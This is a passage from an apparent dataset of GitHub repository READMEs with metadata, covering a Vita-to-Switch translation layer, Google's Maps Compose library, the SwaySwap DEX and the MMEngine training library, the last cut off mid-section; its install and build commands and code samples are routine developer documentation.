adjust the path according to the location of your file path=atmosphere/vita2hos.nsp ``` - Note: As long as this file exists you won't be able to use the homebrew menu and instead will always run _vita2hos_. A quick workaround would be to rename the file and restart your Switch. Unfortunately `override_config.ini` doesn't allow multiple `path` entries, which is why it has to be done this way. 3. Copy a PlayStation Vita executable (`.velf` or `.self`/`eboot.bin`) to `sd:/vita2hos/executable` 4. Boot (or reboot) your Switch and start any game while holding down `R` - Attempting to use _vita2hos_ via applet mode (album button) will currently result in a fatal error and wouldn't be recommended anyway. 5. Enjoy! ### Running it on yuzu 1. Copy a PlayStation Vita executable (`.velf` or `.self`/`eboot.bin`) to `sd:/vita2hos/executable` (_File_ → _Open yuzu Folder_ → `sdmc/`) 2. Run `vita2hos.nsp` 3. Enjoy! ### Running it on Ryujinx 1. Copy a PlayStation Vita executable (`.velf` or `.self`/`eboot.bin`) to `sd:/vita2hos/executable` (_File_ → _Open Ryujinx Folder_ → `sdcard/`) 2. Disable PPTC (_Options_ → _Settings_ → _System_ → Unselect _Enable PPTC (Profiled Persistent Translation Cache)_) 3. Run `vita2hos.nsp` 4. Enjoy! ## Building 1. `mkdir build && cd build` 2. Two options:\ &ensp;a. `arm-none-eabi-cmake ..`\ &ensp;b. `cmake -DCMAKE_TOOLCHAIN_FILE:FILEPATH=$DEVKITPRO/cmake/devkitARM.cmake ..` 3. `make` (or `ninja` if configured with `-G Ninja`) 4. `vita2hos.nsp` will be generated I recommend passing `-DCMAKE_COLOR_DIAGNOSTICS:BOOL=TRUE`, especially when using Ninja. ## Project status, compatibility and supported features This is still at a very early stage, and therefore it can only run very simple CPU-rendered PlayStation Vita homebrews. There is only very initial 3D graphics support (it can run vitasdk's GXM triangle and cube samples by hardcoding _vita2hos_'s GLSL shaders to match the Cg shaders the samples use). ## Special Thanks A few noteworthy teams/projects who've helped along the way are: * **[Vita3K](https://vita3k.org/)** _vita2hos_ uses Vita3K's shader recompiler, and some parts of _vita2hos_'s code are based on Vita3K's implementation. Please, consider [**donating**](https://vita3k.org/#donate) and [**contributing**](https://vita3k.org/#contribute) to Vita3K! * **[UAM - deko3d shader compiler](https://github.com/devkitPro/uam)** _vita2hos_ uses UAM ([deko3d](https://github.com/devkitPro/deko3d)'s shader compiler) to compile shaders. Please, also consider contributing to that project and donating to the developers! 
* **[Ryujinx](https://ryujinx.org/)** * **[yuzu](https://yuzu-emu.org/)** * **[Atmosphère](https://github.com/Atmosphere-NX/Atmosphere)** * **[Switchbrew](https://github.com/switchbrew/)** Also special thanks to @PixelyIon and @SciresM for their help, and to all the testers, especially @TSRBerry. ## Disclaimer * **Nintendo Switch** is a trademark of **Nintendo Co., Ltd** * **PlayStation Vita** is a trademark of **Sony Interactive Entertainment**
[WIP] PlayStation Vita to Horizon OS (Nintendo Switch OS) translation layer
null
3
14
5
119
4
8
0
googlemaps/android-maps-compose
![Tests](https://github.com/googlemaps/android-maps-compose/actions/workflows/test.yml/badge.svg) ![Stable](https://img.shields.io/badge/stability-stable-green) [![Discord](https://img.shields.io/discord/676948200904589322)][Discord server] ![Apache-2.0](https://img.shields.io/badge/license-Apache-blue) # Maps Compose 🗺 ## Description This repository contains [Jetpack Compose][jetpack-compose] components for the [Maps SDK for Android][maps-sdk]. ## Requirements * Kotlin-enabled project * Jetpack Compose-enabled project (see [releases](https://github.com/googlemaps/android-maps-compose/releases) for the required version of Jetpack Compose) * An [API key][api-key] * API level 21+ ## Installation You no longer need to specify the Maps SDK for Android or its Utility Library as separate dependencies, since `maps-compose` and `maps-compose-utils` pull in the appropriate versions of these respectively. ```groovy dependencies { implementation 'com.google.maps.android:maps-compose:5.0.4' // Optionally, you can include the Compose utils library for Clustering, // Street View metadata checks, etc. implementation 'com.google.maps.android:maps-compose-utils:5.0.4' // Optionally, you can include the widgets library for ScaleBar, etc. implementation 'com.google.maps.android:maps-compose-widgets:5.0.4' } ``` ## Sample App This repository includes a [sample app](app). To run it: 1. Get a [Maps API key][api-key] 1. Create a file in the root directory named `local.properties` with a single line that looks like this, replacing YOUR_KEY with the key from step 1: `MAPS_API_KEY=YOUR_KEY` 1. Build and run ## Documentation You can learn more about all the extensions provided by this library by reading the [reference documents][Javadoc]. ## Usage Adding a map to your app looks like the following: ```kotlin val singapore = LatLng(1.35, 103.87) val cameraPositionState = rememberCameraPositionState { position = CameraPosition.fromLatLngZoom(singapore, 10f) } GoogleMap( modifier = Modifier.fillMaxSize(), cameraPositionState = cameraPositionState ) ``` <details> <summary>Creating and configuring a map</summary> ## Creating and configuring a map Configuring the map can be done by passing a `MapProperties` object into the `GoogleMap` composable, or for UI-related configurations, use `MapUiSettings`. `MapProperties` and `MapUiSettings` should be your first go-to for configuring the map. For any other configuration not present in those two classes, use `googleMapOptionsFactory` to provide a `GoogleMapOptions` instance instead. Typically, anything that can only be provided once (i.e. when the map is created)—like map ID—should be provided via `googleMapOptionsFactory`. 
```kotlin // Set properties using MapProperties which you can use to recompose the map var mapProperties by remember { mutableStateOf( MapProperties(maxZoomPreference = 10f, minZoomPreference = 5f) ) } var mapUiSettings by remember { mutableStateOf( MapUiSettings(mapToolbarEnabled = false) ) } Box(Modifier.fillMaxSize()) { GoogleMap(properties = mapProperties, uiSettings = mapUiSettings) Column { Button(onClick = { mapProperties = mapProperties.copy( isBuildingEnabled = !mapProperties.isBuildingEnabled ) }) { Text(text = "Toggle isBuildingEnabled") } Button(onClick = { mapUiSettings = mapUiSettings.copy( mapToolbarEnabled = !mapUiSettings.mapToolbarEnabled ) }) { Text(text = "Toggle mapToolbarEnabled") } } } // ...or initialize the map by providing a googleMapOptionsFactory // This should only be used for values that do not recompose the map such as // map ID. GoogleMap( googleMapOptionsFactory = { GoogleMapOptions().mapId("MyMapId") } ) ``` </details> <details> <summary>Controlling a map's camera</summary> ### Controlling a map's camera Camera changes and updates can be observed and controlled via `CameraPositionState`. **Note**: `CameraPositionState` is the source of truth for anything camera related. So, providing a camera position in `GoogleMapOptions` will be overridden by `CameraPositionState`. ```kotlin val singapore = LatLng(1.35, 103.87) val cameraPositionState: CameraPositionState = rememberCameraPositionState { position = CameraPosition.fromLatLngZoom(singapore, 11f) } Box(Modifier.fillMaxSize()) { GoogleMap(cameraPositionState = cameraPositionState) Button(onClick = { // Move the camera to a new zoom level cameraPositionState.move(CameraUpdateFactory.zoomIn()) }) { Text(text = "Zoom In") } } ``` </details> <details> <summary>Drawing on a map</summary> ### Drawing on a map Drawing on the map, such as adding markers, can be accomplished by adding child composable elements to the content of the `GoogleMap`. ```kotlin GoogleMap( googleMapOptionsFactory = { GoogleMapOptions().mapId("DEMO_MAP_ID") }, //... ) { AdvancedMarker( state = MarkerState(position = LatLng(-34.0, 151.0)), title = "Marker in Sydney" ) AdvancedMarker( state = MarkerState(position = LatLng(35.66, 139.6)), title = "Marker in Tokyo" ) } ``` You can customize a marker by using `PinConfig` with an `AdvancedMarker`. ```kotlin val state = MyState() GoogleMap( googleMapOptionsFactory = { GoogleMapOptions().mapId("DEMO_MAP_ID") }, //... ) { val pinConfig = PinConfig.builder() .setBackgroundColor(Color.MAGENTA) .build() AdvancedMarker( state = MarkerState(position = LatLng(-34.0, 151.0)), title = "Magenta marker in Sydney", pinConfig = pinConfig ) } ``` </details> <details> <summary>Shapes</summary> ### Shapes A shape is an object on the map, tied to a latitude/longitude coordinate. Currently, android-maps-compose offers `Polyline`, `Polygon` and `Circle`. For all shapes, you can customize their appearance by altering a number of properties. #### Polyline A `Polyline` is a series of connected line segments that can form any shape you want and can be used to mark paths and routes on the map: ```kotlin val polylinePoints = remember { listOf(singapore, singapore5) } // ... Polyline( points = polylinePoints ) ``` You can use spans to individually color segments of a polyline, by creating StyleSpan objects: ```kotlin val styleSpan = StyleSpan( StrokeStyle.gradientBuilder( Color.Red.toArgb(), Color.Green.toArgb(), ).build(), ) // ... 
val polylinePoints = remember { listOf(singapore, singapore5) } val styleSpanList = remember { listOf(styleSpan) } // ... Polyline( points = polylinePoints, spans = styleSpanList, ) ``` #### Polygon A `Polygon` is an enclosed shape that can be used to mark areas on the map: ```kotlin val polygonPoints = remember { listOf(singapore1, singapore2, singapore3) } // ... Polygon( points = polygonPoints, fillColor = Color.Black.copy(alpha = 0.5f) ) ``` #### Circle A Circle is a geographically accurate projection of a circle on the Earth's surface drawn on the map: ```kotlin var circleCenter by remember { mutableStateOf(singapore) } // ... Circle( center = circleCenter, fillColor = MaterialTheme.colors.secondary, strokeColor = MaterialTheme.colors.secondaryVariant, radius = 1000.0, ) ``` </details> <details> <summary>Recomposing elements</summary> ### Recomposing elements Markers and other elements need to be recomposed on the screen. To achieve recomposition, you can set mutable properties of state objects: ```kotlin val markerState = rememberMarkerState(position = singapore) //... LaunchedEffect(Unit) { repeat(10) { delay(5.seconds) val old = markerState.position markerState.position = LatLng(old.latitude + 1.0, old.longitude + 2.0) } } ``` In the example above, recomposition occurs as `MarkerState.position` is updated with different values over time, shifting the Marker around the screen. </details> <details> <summary>Customizing a marker's info window</summary> ### Customizing a marker's info window You can customize a marker's info window contents by using the `MarkerInfoWindowContent` element, or if you want to customize the entire info window, use the `MarkerInfoWindow` element instead. Both of these elements accept a `content` parameter to provide your customization in a composable lambda expression. ```kotlin MarkerInfoWindowContent( //... ) { marker -> Text(marker.title ?: "Default Marker Title", color = Color.Red) } MarkerInfoWindow( //... ) { marker -> // Implement the custom info window here Column { Text(marker.title ?: "Default Marker Title", color = Color.Red) Text(marker.snippet ?: "Default Marker Snippet", color = Color.Red) } } ``` </details> <details> <summary>Street View</summary> ### Street View You can add a Street View given a location using the `StreetView` composable. 1. Test whether a Street View location is valid with the `fetchStreetViewData` utility from the [`maps-compose-utils` library](#maps-compose-utility-library). ```kotlin streetViewResult = fetchStreetViewData(singapore, BuildConfig.MAPS_API_KEY) ``` 2. Once the location is confirmed valid, add a Street View composable by providing a `StreetViewPanoramaOptions` object. ```kotlin val singapore = LatLng(1.3588227, 103.8742114) StreetView( streetViewPanoramaOptionsFactory = { StreetViewPanoramaOptions().position(singapore) } ) ``` </details> <details> <summary>Controlling the map directly (experimental)</summary> ## Controlling the map directly (experimental) Certain use cases may require extending the `GoogleMap` object to decorate / augment the map. It can be obtained with the `MapEffect` Composable. Doing so can be dangerous, as the `GoogleMap` object is managed by this library. ```kotlin GoogleMap( // ... ) { MapEffect { map -> // map is the GoogleMap } } ``` </details> ## Maps Compose Utility Library This library provides optional utilities in the `maps-compose-utils` library from the [Maps SDK for Android Utility Library](https://github.com/googlemaps/android-maps-utils). 

### Clustering

The marker clustering utility helps you manage multiple markers at different zoom levels. When a user views the map at a high zoom level, the individual markers show on the map. When the user zooms out, the markers gather together into clusters, to make viewing the map easier.

The [MarkerClusteringActivity](app/src/main/java/com/google/maps/android/compose/MarkerClusteringActivity.kt) demonstrates usage.

```kotlin
Clustering(
    items = items,
    // Optional: Handle clicks on clusters, cluster items, and cluster item info windows
    onClusterClick = null,
    onClusterItemClick = null,
    onClusterItemInfoWindowClick = null,
    // Optional: Custom rendering for clusters
    clusterContent = null,
    // Optional: Custom rendering for non-clustered items
    clusterItemContent = null,
)
```
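
The `items` passed to `Clustering` implement the `ClusterItem` interface from the underlying Maps SDK utility library. A minimal, hypothetical implementation might look like the following (class and property names are illustrative, and the nullable `getZIndex` override assumes a utility-library version with z-index support):

```kotlin
import com.google.android.gms.maps.model.LatLng
import com.google.maps.android.clustering.ClusterItem

// A hypothetical item type for Clustering(items = ...). Property names avoid
// clashing with the JVM signatures of the ClusterItem getters.
data class PlaceClusterItem(
    val itemPosition: LatLng,
    val itemTitle: String,
    val itemSnippet: String,
) : ClusterItem {
    override fun getPosition(): LatLng = itemPosition
    override fun getTitle(): String = itemTitle
    override fun getSnippet(): String = itemSnippet
    override fun getZIndex(): Float? = null
}
```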

### Street View metadata utility

The `fetchStreetViewData` method provides functionality to check whether a location is supported in Street View. You can avoid errors when adding a Street View panorama to an Android app by calling this metadata utility and only adding a Street View panorama if the response is `OK`.

> [!IMPORTANT]
> Be sure to [enable Street View Static API](https://goo.gle/enable-sv-static-api) on the project associated with your API key.

You can see example usage in the [`StreetViewActivity`](https://github.com/googlemaps/android-maps-compose/blob/main/app/src/main/java/com/google/maps/android/compose/StreetViewActivity.kt) of the demo app:

```kotlin
streetViewResult = fetchStreetViewData(singapore, BuildConfig.MAPS_API_KEY)
```

## Maps Compose Widgets

This library also provides optional composable widgets in the `maps-compose-widgets` library that you can use alongside the `GoogleMap` composable.

### ScaleBar

This widget shows the current scale of the map in feet and meters when zoomed into the map, changing to miles and kilometers, respectively, when zooming out.

A `DisappearingScaleBar` is also included, which appears when the zoom level of the map changes, and then disappears after a configurable timeout period.

The [ScaleBarActivity](app/src/main/java/com/google/maps/android/compose/ScaleBarActivity.kt) demonstrates both of these, with the `DisappearingScaleBar` in the upper left corner and the normal base `ScaleBar` in the upper right:

![maps-compose-scale-bar-cropped](https://user-images.githubusercontent.com/928045/175665891-a0635004-2201-4392-83b3-0c6553b96926.gif)

Both versions of this widget leverage the `CameraPositionState` in `maps-compose` and therefore are very simple to configure with their defaults:

```kotlin
Box(Modifier.fillMaxSize()) {
    GoogleMap(
        modifier = Modifier.fillMaxSize(),
        cameraPositionState = cameraPositionState
    ) {
        // ... your map composables ...
    }

    ScaleBar(
        modifier = Modifier
            .padding(top = 5.dp, end = 15.dp)
            .align(Alignment.TopEnd),
        cameraPositionState = cameraPositionState
    )

    // OR

    DisappearingScaleBar(
        modifier = Modifier
            .padding(top = 5.dp, end = 15.dp)
            .align(Alignment.TopStart),
        cameraPositionState = cameraPositionState
    )
}
```

The colors of the text, line, and shadow are also all configurable (e.g., based on `isSystemInDarkTheme()` on a dark map). Similarly, the `DisappearingScaleBar` animations can be configured.

## Contributing

Contributions are welcome and encouraged! See [contributing] for more info.

## Support

This library is offered via an open source [license](LICENSE). It is not governed by the Google Maps Platform [Technical Support Services Guidelines](https://cloud.google.com/maps-platform/terms/tssg?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss), the [SLA](https://cloud.google.com/maps-platform/terms/sla?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss), or the [Deprecation Policy](https://cloud.google.com/maps-platform/terms?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss) (however, any Google Maps Platform services used by the library remain subject to the Google Maps Platform Terms of Service).

This library adheres to [semantic versioning](https://semver.org/) to indicate when backwards-incompatible changes are introduced.

If you find a bug, or have a feature request, please [file an issue] on GitHub. If you would like to get answers to technical questions from other Google Maps Platform developers, ask through one of our [developer community channels](https://developers.google.com/maps/developer-community?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss), including the Google Maps Platform [Discord server].

[maps-sdk]: https://developers.google.com/maps/documentation/android-sdk
[api-key]: https://developers.google.com/maps/documentation/android-sdk/get-api-key
[Discord server]: https://discord.gg/hYsWbmk
[Javadoc]: https://googlemaps.github.io/android-maps-compose
[contributing]: CONTRIBUTING.md
[code of conduct]: CODE_OF_CONDUCT.md
[file an issue]: https://github.com/googlemaps/android-maps-compose/issues/new/choose
[pull request]: https://github.com/googlemaps/android-maps-compose/compare
[jetpack-compose]: https://developer.android.com/jetpack/compose
Jetpack Compose composables for the Maps SDK for Android
android,kotlin,jetpack-compose,google-maps,maps,language-extension
58
34
275
261
113
14
5
FuelLabs/swayswap
[![build](https://github.com/FuelLabs/swayswap/actions/workflows/gh-pages.yml/badge.svg)](https://github.com/FuelLabs/swayswap/actions/workflows/gh-pages.yml)
[![discord](https://img.shields.io/badge/chat%20on-discord-orange?&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/xfpK4Pe)
![twitter](https://img.shields.io/twitter/follow/SwayLang?style=social)

### ⚠️ Support Notice ⚠️

**SwaySwap is no longer supported** and will not function for beta-4 and later versions of fuel-core (>0.17.1). If you would like to contribute to updating it, a PR will be welcome.

---

## 🌴💰 SwaySwap 💰🌴

SwaySwap is a blazingly fast DEX built on the fastest modular execution layer: [Fuel](https://fuel.network/).

Built with an entirely new language ([Sway](https://github.com/FuelLabs/sway)), virtual machine ([FuelVM](https://github.com/FuelLabs/fuel-specs)), and UTXO-based smart contract blockchain ([Fuel](https://fuel-labs.ghost.io/introducing-fuel-the-fastest-modular-execution-layer/)), you can now experience a demonstration of the next generation of scaling beyond layer-2s and monolithic blockchain design.

<!-- [![launch app button](docs/assets/launch-button.png)](https://fuellabs.github.io/swayswap)
The above button launches the latest stable version of SwaySwap. To launch the latest unstable version that includes all current changes from the master branch, click [here](https://swayswap.vercel.app/). -->

## 📗 Table of contents

- [SwaySwap Features](#-swayswap-features)
- [Getting Started](./docs/GETTING_STARTED.md)
  - [Requirements](./docs/GETTING_STARTED.md#requirements)
  - [Running Project Locally](./docs/GETTING_STARTED.md#running-project-locally)
    - [📚 - Getting the Repository](./docs/GETTING_STARTED.md#---getting-the-repository)
    - [📦 - Install Dependencies](./docs/GETTING_STARTED.md#---install-dependencies)
    - [📒 - Run Local Node](./docs/GETTING_STARTED.md#---run-local-node)
    - [💻 - Run Web App](./docs/GETTING_STARTED.md#---run-web-app)
  - [📗 Project Overview](./docs/GETTING_STARTED.md#-project-overview)
  - [🧰 Useful Scripts](./docs/GETTING_STARTED.md#-useful-scripts)
  - [Running Tests](./docs/GETTING_STARTED.md#running-tests)
    - [Run Tests in Development Mode](./docs/GETTING_STARTED.md#run-tests-in-development-mode)
    - [Run Tests on a Local Test Environment](./docs/GETTING_STARTED.md#run-tests-on-a-local-test-environment)
- [Contribution Guide](./docs/CONTRIBUTING.md)
  - [Finding Something to Work On](./docs/CONTRIBUTING.md#finding-something-to-work-on)
  - [Contribution Flow](./docs/CONTRIBUTING.md#contribution-flow)
- [License](#license)

## 🧰 SwaySwap Features

- Faucet coins: use the faucet API to send test ETH to your wallet
- Mint tokens: use the token contract to mint test DAI to your wallet
- Create a liquidity pool
- Swap tokens
- View current pool positions
- Add and remove liquidity from a liquidity pool

<!-- Add some more space on the top of the gif -->
<br />
<br />

<p align="center">
  <img alt="preview pages" width="800" src="docs/assets/preview-pages.gif">
</p>

## License

The primary license for this repo is `Apache-2.0`, see [`LICENSE`](./LICENSE).
SwaySwap is a blazingly fast DEX built on the fastest modular execution layer: Fuel.
null
28
72
225
211
33
3
3
kannagi0303/yt-dlp-gui
null
Windows GUI for yt-dlp
ffmpeg,yt-dlp,yt-dlp-gui,youtube-dl,downloader,youtube,youtube-dl-gui,youtube-downloader
9
12
21
148
35
1
1
open-mmlab/mmengine
<div align="center">
  <img src="https://user-images.githubusercontent.com/58739961/187154444-fce76639-ac8d-429b-9354-c6fac64b7ef8.jpg" width="600"/>
  <div>&nbsp;</div>
  <div align="center">
    <b><font size="5">OpenMMLab website</font></b>
    <sup>
      <a href="https://openmmlab.com">
        <i><font size="4">HOT</font></i>
      </a>
    </sup>
    &nbsp;&nbsp;&nbsp;&nbsp;
    <b><font size="5">OpenMMLab platform</font></b>
    <sup>
      <a href="https://platform.openmmlab.com">
        <i><font size="4">TRY IT OUT</font></i>
      </a>
    </sup>
  </div>
  <div>&nbsp;</div>

[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/mmengine)](https://pypi.org/project/mmengine/)
[![pytorch](https://img.shields.io/badge/pytorch-1.6~2.1-yellow)](#installation)
[![PyPI](https://img.shields.io/pypi/v/mmengine)](https://pypi.org/project/mmengine)
[![license](https://img.shields.io/github/license/open-mmlab/mmengine.svg)](https://github.com/open-mmlab/mmengine/blob/main/LICENSE)

[Introduction](#introduction) | [Installation](#installation) | [Get Started](#get-started) | [📘Documentation](https://mmengine.readthedocs.io/en/latest/) | [🤔Reporting Issues](https://github.com/open-mmlab/mmengine/issues/new/choose)

</div>

<div align="center">

English | [简体中文](README_zh-CN.md)

</div>

<div align="center">
  <a href="https://openmmlab.medium.com/" style="text-decoration:none;">
    <img src="https://user-images.githubusercontent.com/25839884/219255827-67c1a27f-f8c5-46a9-811d-5e57448c61d1.png" width="3%" alt="" /></a>
  <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" />
  <a href="https://discord.com/channels/1037617289144569886/1073056342287323168" style="text-decoration:none;">
    <img src="https://user-images.githubusercontent.com/25839884/218347213-c080267f-cbb6-443e-8532-8e1ed9a58ea9.png" width="3%" alt="" /></a>
  <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" />
  <a href="https://twitter.com/OpenMMLab" style="text-decoration:none;">
    <img src="https://user-images.githubusercontent.com/25839884/218346637-d30c8a0f-3eba-4699-8131-512fb06d46db.png" width="3%" alt="" /></a>
  <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" />
  <a href="https://www.youtube.com/openmmlab" style="text-decoration:none;">
    <img src="https://user-images.githubusercontent.com/25839884/218346691-ceb2116a-465a-40af-8424-9f30d2348ca9.png" width="3%" alt="" /></a>
  <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" />
  <a href="https://space.bilibili.com/1293512903" style="text-decoration:none;">
    <img src="https://user-images.githubusercontent.com/25839884/219026751-d7d14cce-a7c9-4e82-9942-8375fca65b99.png" width="3%" alt="" /></a>
  <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" />
  <a href="https://www.zhihu.com/people/openmmlab" style="text-decoration:none;">
    <img src="https://user-images.githubusercontent.com/25839884/219026120-ba71e48b-6e94-4bd4-b4e9-b7d175b5e362.png" width="3%" alt="" /></a>
</div>

## What's New

v0.10.4 was released on 2024-4-23.

Highlights:

- Support custom `artifact_location` in MLflowVisBackend [#1505](#1505)
- Enable `exclude_frozen_parameters` for `DeepSpeedEngine._zero3_consolidated_16bit_state_dict` [#1517](#1517)

Read [Changelog](./docs/en/notes/changelog.md#v0104-2342024) for more details.

## Introduction

MMEngine is a foundational library for training deep learning models based on PyTorch. It serves as the training engine of all OpenMMLab codebases, which support hundreds of algorithms in various research areas. Moreover, MMEngine is generic enough to be applied to non-OpenMMLab projects. Its highlights are as follows:

**Integrates mainstream large-scale model training frameworks**

- [ColossalAI](https://mmengine.readthedocs.io/en/latest/common_usage/large_model_training.html#colossalai)
- [DeepSpeed](https://mmengine.readthedocs.io/en/latest/common_usage/large_model_training.html#deepspeed)
- [FSDP](https://mmengine.readthedocs.io/en/latest/common_usage/large_model_training.html#fullyshardeddataparallel-fsdp)

**Supports a variety of training strategies**

- [Mixed Precision Training](https://mmengine.readthedocs.io/en/latest/common_usage/speed_up_training.html#mixed-precision-training)
- [Gradient Accumulation](https://mmengine.readthedocs.io/en/latest/common_usage/save_gpu_memory.html#gradient-accumulation)
- [Gradient Checkpointing](https://mmengine.readthedocs.io/en/latest/common_usage/save_gpu_memory.html#gradient-checkpointing)

**Provides a user-friendly configuration system**

- [Pure Python-style configuration files, easy to navigate](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/config.html#a-pure-python-style-configuration-file-beta)
- [Plain-text-style configuration files, supporting JSON and YAML](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/config.html)

**Covers mainstream training monitoring platforms**

- [TensorBoard](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#tensorboard) | [WandB](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#wandb) | [MLflow](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#mlflow-wip)
- [ClearML](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#clearml) | [Neptune](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#neptune) | [DVCLive](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#dvclive) | [Aim](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#aim)

## Installation

<details>
<summary>Supported PyTorch Versions</summary>

| MMEngine           | PyTorch      | Python         |
| ------------------ | ------------ | -------------- |
| main               | >=1.6 \<=2.1 | >=3.8, \<=3.11 |
| >=0.9.0, \<=0.10.4 | >=1.6 \<=2.1 | >=3.8, \<=3.11 |

</details>

Before installing MMEngine, please ensure that PyTorch has been successfully installed following the [official guide](https://pytorch.org/get-started/locally/).

Install MMEngine:

```bash
pip install -U openmim
mim install mmengine
```

Verify the installation:

```bash
python -c 'from mmengine.utils.dl_utils import collect_env;print(collect_env())'
```

## Get Started

Taking the training of a ResNet-50 model on the CIFAR-10 dataset as an example, we will use MMEngine to build a complete, configurable training and validation process in less than 80 lines of code.

<details>
<summary>Build Models</summary>

First, we need to define a **model** which 1) inherits from `BaseModel` and 2) accepts an additional argument `mode` in the `forward` method, in addition to those arguments related to the dataset.

- During training, the value of `mode` is "loss", and the `forward` method should return a `dict` containing the key "loss".
- During validation, the value of `mode` is "predict", and the `forward` method should return results containing both predictions and labels.

```python
import torch.nn.functional as F
import torchvision
from mmengine.model import BaseModel


class MMResNet50(BaseModel):
    def __init__(self):
        super().__init__()
        self.resnet = torchvision.models.resnet50()

    def forward(self, imgs, labels, mode):
        x = self.resnet(imgs)
        if mode == 'loss':
            return {'loss': F.cross_entropy(x, labels)}
        elif mode == 'predict':
            return x, labels
```

</details>

<details>
<summary>Build Datasets</summary>

Next, we need to create **Dataset**s and **DataLoader**s for training and validation. In this case, we simply use built-in datasets supported by TorchVision.

```python
import torchvision.transforms as transforms
from torch.utils.data import DataLoader

norm_cfg = dict(mean=[0.491, 0.482, 0.447], std=[0.202, 0.199, 0.201])
train_dataloader = DataLoader(batch_size=32,
                              shuffle=True,
                              dataset=torchvision.datasets.CIFAR10(
                                  'data/cifar10',
                                  train=True,
                                  download=True,
                                  transform=transforms.Compose([
                                      transforms.RandomCrop(32, padding=4),
                                      transforms.RandomHorizontalFlip(),
                                      transforms.ToTensor(),
                                      transforms.Normalize(**norm_cfg)
                                  ])))

val_dataloader = DataLoader(batch_size=32,
                            shuffle=False,
                            dataset=torchvision.datasets.CIFAR10(
                                'data/cifar10',
                                train=False,
                                download=True,
                                transform=transforms.Compose([
                                    transforms.ToTensor(),
                                    transforms.Normalize(**norm_cfg)
                                ])))
```

</details>

<details>
<summary>Build Metrics</summary>

To validate and test the model, we need to define a **Metric** called accuracy to evaluate the model. This metric needs to inherit from `BaseMetric` and implement the `process` and `compute_metrics` methods.

```python
from mmengine.evaluator import BaseMetric


class Accuracy(BaseMetric):
    def process(self, data_batch, data_samples):
        score, gt = data_samples
        # Save the results of a batch to `self.results`
        self.results.append({
            'batch_size': len(gt),
            'correct': (score.argmax(dim=1) == gt).sum().cpu(),
        })

    def compute_metrics(self, results):
        total_correct = sum(item['correct'] for item in results)
        total_size = sum(item['batch_size'] for item in results)
        # Returns a dictionary with the results of the evaluated metrics,
        # where the key is the name of the metric
        return dict(accuracy=100 * total_correct / total_size)
```

</details>

<details>
<summary>Build a Runner</summary>

Finally, we can construct a **Runner** with the previously defined `Model`, `DataLoader`, and `Metrics`, plus some other configs, as shown below.

```python
from torch.optim import SGD
from mmengine.runner import Runner

runner = Runner(
    model=MMResNet50(),
    work_dir='./work_dir',
    train_dataloader=train_dataloader,
    # a wrapper to execute back propagation and gradient update, etc.
    optim_wrapper=dict(optimizer=dict(type=SGD, lr=0.001, momentum=0.9)),
    # set some training configs like epochs
    train_cfg=dict(by_epoch=True, max_epochs=5, val_interval=1),
    val_dataloader=val_dataloader,
    val_cfg=dict(),
    val_evaluator=dict(type=Accuracy),
)
```

</details>

<details>
<summary>Launch Training</summary>

```python
runner.train()
```

</details>

## Learn More

<details>
<summary>Tutorials</summary>

- [Runner](https://mmengine.readthedocs.io/en/latest/tutorials/runner.html)
- [Dataset and DataLoader](https://mmengine.readthedocs.io/en/latest/tutorials/dataset.html)
- [Model](https://mmengine.readthedocs.io/en/latest/tutorials/model.html)
- [Evaluation](https://mmengine.readthedocs.io/en/latest/tutorials/evaluation.html)
- [OptimWrapper](https://mmengine.readthedocs.io/en/latest/tutorials/optim_wrapper.html)
- [Parameter Scheduler](https://mmengine.readthedocs.io/en/latest/tutorials/param_scheduler.html)
- [Hook](https://mmengine.readthedocs.io/en/latest/tutorials/hook.html)

</details>

<details>
<summary>Advanced tutorials</summary>

- [Registry](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/registry.html)
- [Config](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/config.html)
- [BaseDataset](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/basedataset.html)
- [Data Transform](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/data_transform.html)
- [Weight Initialization](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/initialize.html)
- [Visualization](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/visualization.html)
- [Abstract Data Element](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/data_element.html)
- [Distribution Communication](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/distributed.html)
- [Logging](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/logging.html)
- [File IO](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/fileio.html)
- [Global manager (ManagerMixin)](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/manager_mixin.html)
- [Use modules from other libraries](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/cross_library.html)
- [Test Time Augmentation](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/test_time_augmentation.html)

</details>

<details>
<summary>Examples</summary>

- [Train a GAN](https://mmengine.readthedocs.io/en/latest/examples/train_a_gan.html)

</details>

<details>
<summary>Common Usage</summary>

- [Resume Training](https://mmengine.readthedocs.io/en/latest/common_usage/resume_training.html)
